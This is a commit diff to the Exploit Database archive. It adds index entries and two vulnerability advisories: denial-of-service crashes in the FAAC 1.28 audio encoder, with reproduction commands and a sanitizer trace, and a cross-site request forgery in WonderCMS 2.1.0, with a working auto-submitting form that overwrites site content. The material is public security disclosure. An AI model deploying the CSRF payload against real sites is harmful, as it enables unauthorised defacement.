DB: 2017-06-21

2 new exploits Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service Sudo - 'get_process_ttyname()' Privilege Escalation Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation WonderCMS 2.1.0 - Cross-Site Request Forgery
2017-06-21 05:01:28 +00:00 · 2017-06-21 05:01:28 +00:00 · b00ce2562c
commit b00ce2562c
parent 380d33dd22
4 changed files with 115 additions and 2 deletions
--- a/files.csv
+++ b/files.csv
@ -5555,6 +5555,7 @@ id,file,description,date,author,platform,type,port
 42202,platforms/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42203,platforms/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42204,platforms/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42207,platforms/linux/dos/42207.txt,"Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service",2017-06-20,qflb.wu,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9066,7 +9067,7 @@ id,file,description,date,author,platform,type,port
 42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0
 42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0
-42183,platforms/linux/local/42183.c,"Sudo - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
+42183,platforms/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -38029,3 +38030,4 @@ id,file,description,date,author,platform,type,port
 42195,platforms/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
 42196,platforms/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
 42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0
+42205,platforms/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps,0
--- a/platforms/linux/dos/42207.txt
+++ b/platforms/linux/dos/42207.txt
@ -0,0 +1,52 @@
+Freeware Advanced Audio Coder (FAAC) multiple vulnerabilities
+
+================
+Author : qflb.wu
+===============
+
+Introduction:
+=============
+FAAC is an encoder for a lossy sound compression scheme specified in MPEG-2 Part 7 and MPEG-4 Part 3 standards and known as Advanced Audio Coding (AAC). This encoder is useful for producing files that can be played back on iPod. Moreover, iPod does not understand other sound compression schemes in video files.
+
+Affected version:
+=====
+1.28
+
+Vulnerability Description:
+==========================
+1.
+the wav_open_read function in frontend/input.c in Freeware Advanced Audio Coder (FAAC) 1.28 can cause a denial of service(large loop) via a crafted wav file.
+
+./faac faac_1.28_wav_open_read_large_loop.wav -o out.aac
+
+POC:
+faac_1.28_wav_open_read_large_loop.wav
+CVE:
+CVE-2017-9129
+
+2.
+the faacEncOpen function in libfaac/frame.c in Freeware Advanced Audio Coder (FAAC) 1.28 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
+
+./faac faac_1.28_faacEncOpen_invalid_memory.wav -o out.aac
+
+ASAN:SIGSEGV
+=================================================================
+==49677==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3e959c9b34 (pc 0x7f3e96bf7739 sp 0x7ffe47c93980 bp 0x000000a59e50 T0)
+    #0 0x7f3e96bf7738 in faacEncOpen /home/a/Downloads/faac-1.28/libfaac/frame.c:368
+    #1 0x49c444 in main /home/a/Downloads/faac-1.28/frontend/main.c:803
+    #2 0x7f3e959d3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
+    #3 0x49311c in _start (/home/a/Downloads/faac-1.28/frontend/.libs/lt-faac+0x49311c)
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/faac-1.28/libfaac/frame.c:368 faacEncOpen
+==49677==ABORTING
+
+POC:
+faac_1.28_faacEncOpen_invalid_memory.wav
+CVE:
+CVE-2017-9130
+
+===============================
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42207.zip
--- a/platforms/php/webapps/42205.html
+++ b/platforms/php/webapps/42205.html
@ -0,0 +1,60 @@
+<!--
+# Exploit Title: Cross-Site Request Forgery in WonderCMS
+# Date: 2017-06-19
+# Exploit Author: Zerox Security Lab
+# Software Link: https://www.wondercms.com
+# Version: 2.1.0
+# Twitter: https://twitter.com/ZeroxSecLab
+
+0xCode Lab ID:
+---------------
+0xC-201706-002
+
+Introduction:
+-------------
+WonderCMS is a free open source Content Management System. In other
+words, WonderCMS is a free website builder.
+WonderCMS doesn't require any configuration and can be simply unzipped
+and uploaded to your hosting provider. The database is a text file
+which you can copy, move, backup and restore easily.
+
+Proof of Concept (PoC):
+------------------------
+-->
+<html>
+<body>
+<form action="http://localhost/wonder/" method="post">
+	<input name="fieldname" value="title">
+	<input name="content" value="Hacked By 0xCode Security Lab">
+	<input name="target" value="pages">
+	<input type="submit" value="ok">
+</form>
+</body>
+</html>
+<script>
+	document.forms[0].submit();
+</script>
+<!--
+Disclosure Timeline:
+---------------------
+2017-06-16: Vulnerability found.
+2017-06-17: Reported to vendor.
+2017-06-17: Vendor responded and send a new version for test in it.
+2017-06-17: Test new version and vulernability patched successfully.
+2017-06-18: Vendor responded, update released.
+2017-06-19: Public Disclosure.
+
+Fix:
+----
+This issue fixed in WonderCMS 2.2.0
+
+References:
+------------
+https://www.wondercms.com/whatsnew
+https://www.wondercms.com/forum/viewtopic.php?f=8&t=885
+https://github.com/robiso/wondercms/issues/36
+
+Credits & Authors:
+------------------
+Zerox Security Lab
+-->
--- a/platforms/windows/webapps/42091.txt
+++ b/platforms/windows/webapps/42091.txt
@ -19,7 +19,6 @@ An independent security researcher has reported this vulnerability to Beyond Sec
 Vendor response
 IBM has released patches to address those vulnerabilities and issued the following CVE’s:

-CVE-2016-2183
 CVE-2017-1092
 For more Information – http://www-01.ibm.com/support/docview.wss?uid=swg22002897